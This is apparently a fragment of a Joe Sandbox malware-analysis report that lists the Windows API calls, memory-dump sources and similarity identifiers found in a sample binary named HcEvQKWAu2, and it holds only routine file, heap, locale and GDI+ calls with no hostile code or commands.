                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00F8D343,00000001,?,?,?,00000000,00F9551D,?,?,?), ref: 00F89F9E
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00F9551D,?,?,?,?,?,00F94FC7,?), ref: 00F89FE5
                                          • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00F8D343,00000001,?,?), ref: 00F8A011
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FileWrite$Handle
                                          • String ID:
                                          • API String ID: 4209713984-0
                                          APIs
                                            • Part of subcall function 00F8C27E: _wcslen.LIBCMT ref: 00F8C284
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A2D9
                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A30C
                                          • GetLastError.KERNEL32(?,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A329
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$ErrorLast_wcslen
                                          • String ID:
                                          • API String ID: 2260680371-0
                                          APIs
                                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00FAB8B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID:
                                          • API String ID: 1807457897-3916222277
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FAAFDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx
                                          • API String ID: 2568140703-3893581201
                                          APIs
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FAA56F), ref: 00FAAF55
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CountCriticalInitializeSectionSpin
                                          • String ID: InitializeCriticalSectionEx
                                          • API String ID: 2593887523-3084827643
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Alloc
                                          • String ID: FlsAlloc
                                          • API String ID: 2773662609-671089009
                                          APIs
                                            • Part of subcall function 00FAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FABA44,?), ref: 00FAB7E6
                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FABA89,?,00000000), ref: 00FABC64
                                          • GetCPInfo.KERNEL32(00000000,00FABA89,?,?,?,00FABA89,?,00000000), ref: 00FABC77
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CodeInfoPageValid
                                          • String ID:
                                          • API String ID: 546120528-0
                                          APIs
                                          • SetFilePointer.KERNEL32(000000FF,?,?,?,-00000870,00000000,00000800,?,00F89A50,?,?,00000000,?,?,00F88CBC,?), ref: 00F89BAB
                                          • GetLastError.KERNEL32(?,00000000,00F88411,-00009570,00000000,000007F3), ref: 00F89BB6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          APIs
                                            • Part of subcall function 00FA97E5: GetLastError.KERNEL32(?,00FC1030,00FA4674,00FC1030,?,?,00FA3F73,00000050,?,00FC1030,00000200), ref: 00FA97E9
                                            • Part of subcall function 00FA97E5: _free.LIBCMT ref: 00FA981C
                                            • Part of subcall function 00FA97E5: SetLastError.KERNEL32(00000000,?,00FC1030,00000200), ref: 00FA985D
                                            • Part of subcall function 00FA97E5: _abort.LIBCMT ref: 00FA9863
                                            • Part of subcall function 00FABB4E: _abort.LIBCMT ref: 00FABB80
                                            • Part of subcall function 00FABB4E: _free.LIBCMT ref: 00FABBB4
                                            • Part of subcall function 00FAB7BB: GetOEMCP.KERNEL32(00000000,?,?,00FABA44,?), ref: 00FAB7E6
                                          • _free.LIBCMT ref: 00FABA9F
                                          • _free.LIBCMT ref: 00FABAD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID:
                                          • API String ID: 2991157371-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F81E55
                                            • Part of subcall function 00F83BBA: __EH_prolog.LIBCMT ref: 00F83BBF
                                          • _wcslen.LIBCMT ref: 00F81EFD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: H_prolog$_wcslen
                                          • String ID:
                                          • API String ID: 2838827086-0
                                          APIs
                                          • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00F873BC,?,?,?,00000000), ref: 00F89DBC
                                          • SetFileTime.KERNEL32(?,?,?,?), ref: 00F89E70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushTime
                                          • String ID:
                                          • API String ID: 1392018926-0
                                          APIs
                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00F89F27,?,?,00F8771A), ref: 00F896E6
                                          • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00F89F27,?,?,00F8771A), ref: 00F89716
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          APIs
                                          • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00F89EC7
                                          • GetLastError.KERNEL32 ref: 00F89ED4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer
                                          • String ID:
                                          • API String ID: 2976181284-0
                                          APIs
                                          • _free.LIBCMT ref: 00FA8E75
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FC1098,00F817CE,?,?,00000007,?,?,?,00F813D6,?,00000000), ref: 00FA8EB1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Heap$AllocAllocate_free
                                          • String ID:
                                          • API String ID: 2447670028-0
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?), ref: 00F910AB
                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00F910B2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Process$AffinityCurrentMask
                                          • String ID:
                                          • API String ID: 1231390398-0
                                          APIs
                                          • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AttributesFile$_wcslen
                                          • String ID:
                                          • API String ID: 2673547680-0
                                          APIs
                                          • DeleteFileW.KERNEL32(000000FF,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641,000000FF), ref: 00F8A1F1
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00F8977F,?,?,00F895CF,?,?,?,?,?,00FB2641), ref: 00F8A21F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: DeleteFile$_wcslen
                                          • String ID:
                                          • API String ID: 2643169976-0
                                          APIs
                                          • GdiplusShutdown.GDIPLUS(?,?,?,?,00FB2641,000000FF), ref: 00F9ACB0
                                          • CoUninitialize.COMBASE(?,?,?,?,00FB2641,000000FF), ref: 00F9ACB5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Similarity
                                          • API ID: GdiplusShutdownUninitialize
                                          • String ID:
                                          • API String ID: 3856339756-0
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,?,?,00F8A23A,?,00F8755C,?,?,?,?), ref: 00F8A254
                                            • Part of subcall function 00F8BB03: _wcslen.LIBCMT ref: 00F8BB27
                                          • GetFileAttributesW.KERNEL32(?,?,?,00000800,?,00F8A23A,?,00F8755C,?,?,?,?), ref: 00F8A280
                                          Similarity
                                          • API ID: AttributesFile$_wcslen
                                          • String ID:
                                          • API String ID: 2673547680-0
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F9DEEC
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • SetDlgItemTextW.USER32(00000065,?), ref: 00F9DF03
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Similarity
                                          • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                          • String ID:
                                          • API String ID: 2718869927-0
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                          • LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          Similarity
                                          • API ID: DirectoryLibraryLoadSystem
                                          • String ID:
                                          • API String ID: 1175261203-0
                                          APIs
                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F9A3DA
                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F9A3E1
                                          Similarity
                                          • API ID: BitmapCreateFromGdipStream
                                          • String ID:
                                          • API String ID: 1918208029-0
                                          APIs
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FA2BAA
                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00FA2BB5
                                          Similarity
                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                          • String ID:
                                          • API String ID: 1660781231-0
                                          APIs
                                          Similarity
                                          • API ID: ItemShowWindow
                                          • String ID:
                                          • API String ID: 3351165006-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F88289
                                            • Part of subcall function 00F813DC: __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F8A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          Similarity
                                          • API ID: H_prolog$CloseFind
                                          • String ID:
                                          • API String ID: 2506663941-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F85E37: __EH_prolog.LIBCMT ref: 00F85E3C
                                            • Part of subcall function 00F8CE40: __EH_prolog.LIBCMT ref: 00F8CE45
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F813E1
                                            • Part of subcall function 00F85E37: __EH_prolog.LIBCMT ref: 00F85E3C
                                            • Part of subcall function 00F8CE40: __EH_prolog.LIBCMT ref: 00F8CE45
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9B098
                                            • Part of subcall function 00F813DC: __EH_prolog.LIBCMT ref: 00F813E1
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,00FB3A34), ref: 00FAACF8
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID:
                                          • API String ID: 190572456-0
                                          APIs
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                            • Part of subcall function 00FAB136: RtlAllocateHeap.NTDLL(00000008,00FB3A34,00000000,?,00FA989A,00000001,00000364,?,?,?,00F8D984,?,?,?,00000004,00F8D710), ref: 00FAB177
                                          • _free.LIBCMT ref: 00FAC4E5
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00FB3A34,00000000,?,00FA989A,00000001,00000364,?,?,?,00F8D984,?,?,?,00000004,00F8D710), ref: 00FAB177
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00FA3C3F
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID:
                                          • API String ID: 190572456-0
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F85AC2
                                            • Part of subcall function 00F8B505: __EH_prolog.LIBCMT ref: 00F8B50A
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          APIs
                                            • Part of subcall function 00F8A69B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6C4
                                            • Part of subcall function 00F8A69B: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6F2
